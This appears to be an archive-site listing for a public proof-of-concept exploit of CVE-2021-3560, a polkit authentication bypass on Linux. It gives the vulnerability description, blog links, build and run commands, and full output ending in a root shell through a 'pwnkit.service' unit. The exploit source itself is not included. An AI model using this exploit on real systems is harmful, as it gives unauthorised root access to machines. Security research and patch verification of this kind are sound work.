Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2021-3560 PoC — polkit 代码问题漏洞

Source
https://github.com/WinMin/CVE-2021-3560
Associated Vulnerability
Title:polkit 代码问题漏洞 (CVE-2021-3560)
Description:It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
Description
PolicyKit CVE-2021-3560 Exploitation (Authentication Agent)
Readme
PolicyKit CVE-2021-3560 Exploitation (Authentication Agent)
====
C implementation of CVE-2021-3560 exploitation, blog posts about this exploitation: 
- https://ricterz.me/posts/2022-04-28-a-new-exploit-method-for-cve-2021-3560-polkit-linux-privilege-escalation.txt
- http://noahblog.360.cn/a-new-exploit-method-for-cve-2021-3560-policykit-linux-privilege-escalation

### Contributors
Code by swing (@WinMin), Ricter Z(@RicterZ)

### Usage
```
dev@server:/tmp/CVE-2021-3560$ make
dev@server:/tmp/CVE-2021-3560$ ./exploit
pid:264181 - [ polkit CVE-2021-3560 exploit ] - RicterZ @ 360 Noah Lab, C writed by Swing @ chaitin
pid:264181 - [*] main process running ...
pid:264183 - [*] starting polkit authentication agent ...
pid:264182 - [*] starting polkit authentication agent ...
pid:264185 - [*] starting polkit authentication agent ...
pid:264183 - [*] trying to register authentication agent to polkit ...
pid:264182 - [*] trying to register authentication agent to polkit ...
pid:264183 - [+] polkit authentication agent registered successfully!
pid:264183 - [+] D-Bus message loop now running ..
pid:264185 - [*] trying to register authentication agent to polkit ...
pid:264182 - [+] polkit authentication agent registered successfully!
pid:264182 - [+] D-Bus message loop now running ..
pid:264185 - [+] polkit authentication agent registered successfully!
pid:264185 - [+] D-Bus message loop now running ..
pid:264183 - [*] trying to enable system unit file '/tmp/pwnkit.service' ...
pid:264182 - [*] trying to start systemd service 'pwnkit.service' ...
pid:264185 - [*] trying to reload systemd daemon ...
pid:264183 - [+] received authentication for action 'org.freedesktop.systemd1.manage-unit-files' ...
pid:264183 - [*] sending agent response with cookie: 61-bf243e2d0039ce513f32553f945c80d7-1-dddae4b0320b4030370585c13b6a9985
pid:264182 - [+] received authentication for action 'org.freedesktop.systemd1.manage-units' ...
pid:264182 - [*] sending agent response with cookie: 62-c23ffa64bf9c05a1ca8bf057d56a9dfd-1-8d220cfb275f861dcfacd340fc5a578a
pid:264185 - [+] received authentication for action 'org.freedesktop.systemd1.reload-daemon' ...
pid:264185 - [*] sending agent response with cookie: 63-3b99bb8ff0b6b3ffcb7e6103fbe86073-1-6d47c6a380691defd9c455eba617513d
pid:264181 - [+] file exists, popping root shell ...
pwned-5.0# id
uid=1000(dev) gid=1000(dev) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),131(lxd),132(sambashare),1000(dev)
pwned-5.0#
```
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →